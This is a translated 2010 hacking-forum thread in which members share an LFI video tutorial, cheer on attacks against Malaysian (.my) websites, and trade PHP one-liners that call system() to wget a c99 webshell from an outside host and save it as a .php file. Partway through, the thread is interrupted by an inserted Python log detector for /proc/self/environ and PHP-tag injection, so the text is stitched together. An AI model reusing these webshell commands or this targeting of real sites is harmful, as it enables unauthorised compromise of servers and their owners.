[video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 4:46 am
by Paman
Another video tutorial by the AntiSecurity Team.
This video still uses Tamper Data & /proc/self/environ,
but this time we use an upload form...
big thanks to Vrs-hCk a.k.a ander for the idea ^^
watch the video here
http://pacenoge.org/vid/upload_form.html
download here
http://pacenoge.org/vid/upload_form.swf
upload form script
http://pacenoge.org/tool/upload_form.txt
PS: lifted entirely from evilc0.de
found a .id site: PATCH!!!
found a .my site: GO FOR IT!!!
Greets:
evilc0.de
antisecurity.org
serverisdown.org
mainhack.net
YOU!
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 7:00 am
by 3xtr3m3b0y
Really nice idea, so it looks more ELEGANT than directly planting a script for shell access.
Thanks for the info, Paman...
My Paman really is a kind-hearted person who likes to save money... :kaca:
It's just that nowadays LFI vulns are really rare, so I'll just practice on a local server...
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 10:28 am
by dark_superman
wow, cool, bro
let me try it first
Malaysia, I'm coming :ngakak: :ngakak:
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 9:27 pm
by Paman
LFI is all over the place ...
you can have a look at the bugs at the following link:
http://www.exploit-db.com/author/AntiSecurity
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 9:55 pm
by tey
hohoo, this is awesome.... thx, sir :love:
Re: [video] LFI Local Upload Form
Posted: Tue Apr 27, 2010 10:36 pm
by wiLMaR_kiDz
weww.....
yeah, I only just found out about this too...
because as far as I know, LFI vulns really are rarely found..
thanks for sharing, paman jack.....
*NB: btw, something seems off with my thread from the other day on 1337, om. It wasn't even finished yet. hmm... thieves really are sh*t.. ;(
Re: [video] LFI Local Upload Form
Posted: Wed Apr 28, 2010 8:07 am
by 3xtr3m3b0y
Actually, if the system, exec, shell_exec functions are enabled on that machine, you could also just piggyback a script to download a webshell, right?
<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
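A defender-side check for the traces this thread mentions, added here as an example and not part of any post: it flags access-log lines whose request references /proc/self/environ (also when URL-encoded) or whose Referer/User-Agent header carries a PHP open tag, as a header edited with Tamper Data would. The Combined Log Format layout and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)
ENVIRON_RE = re.compile(r'/proc/self/environ', re.I)
PHP_TAG_RE = re.compile(r'<\?(php|=|\s)', re.I)

# Constructed sample lines (documentation IP range, harmless header content).
SAMPLE = [
    '203.0.113.7 - - [27/Apr/2010:04:50:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [27/Apr/2010:04:51:10 +0000] "GET /index.php?page=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/Apr/2010:04:52:30 +0000] "GET /index.php?page=../../proc/self/environ HTTP/1.1" 200 2048 "-" "<?php echo 1; ?>"',
]


def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded paths are still matched."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def classify(line):
    """Return the reasons a log line is suspicious (empty list if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]  # keep unparseable lines visible for manual review
    reasons = []
    if ENVIRON_RE.search(decode(m["req"])):
        reasons.append("environ-in-request")
    if any(PHP_TAG_RE.search(decode(m[f])) for f in ("ref", "ua")):
        reasons.append("php-tag-in-header")
    return reasons


if __name__ == "__main__":
    for entry in SAMPLE:
        hits = classify(entry)
        if hits:
            print(",".join(hits), "|", entry)
```

A hit on either rule with a 200 status is worth correlating with new .php files appearing in web-writable directories around the same timestamp.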
Re: [video] LFI Local Upload Form
Posted: Wed Apr 28, 2010 6:04 pm
by Paman
3xtr3m3b0y wrote: Actually, if the system, exec, shell_exec functions are enabled on that machine, you could also just piggyback a script to download a webshell, right?
<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
easier: <? system('wget http://www.source.com/c99.txt -O nenen.php'); ?>
trust me.. because even 1 line of command is very valuable,.. er, no.. but because I like nenen ^^v
hsuiahsiuahsiuahsiuahsa
Re: [video] LFI Local Upload Form
Posted: Wed Apr 28, 2010 6:18 pm
by 3xtr3m3b0y
Paman wrote: 3xtr3m3b0y wrote: Actually, if the system, exec, shell_exec functions are enabled on that machine, you could also just piggyback a script to download a webshell, right?
<? system('wget http://www.source.com/c99.txt'); ?>
<? system('mv c99.txt c99.php'); ?>
easier: <? system('wget http://www.source.com/c99.txt -O nenen.php'); ?>
trust me.. because even 1 line of command is very valuable,.. er, no.. but because I like nenen ^^v
hsuiahsiuahsiuahsiuahsa
The important thing is that it's not stale nenen milk, Paman (Ed.: grannies' milk) :devil
Thanks a lot for the enlightenment, Paman...
Re: [video] LFI Local Upload Form
Posted: Thu Apr 29, 2010 3:15 am
by Paman
because I'm sure you've already lost hope at hearing about LFI targets..
please continue by reading the following post from AntiSecurity and trying it out
http://antisecurity.org/0x99/vopcrew-ijo-scanner.html
green, bro, green..
it all depends on the face [NoGe]
real big thanks to
AntiSecurity.org + serverISdown.org + MainHack BrotherHood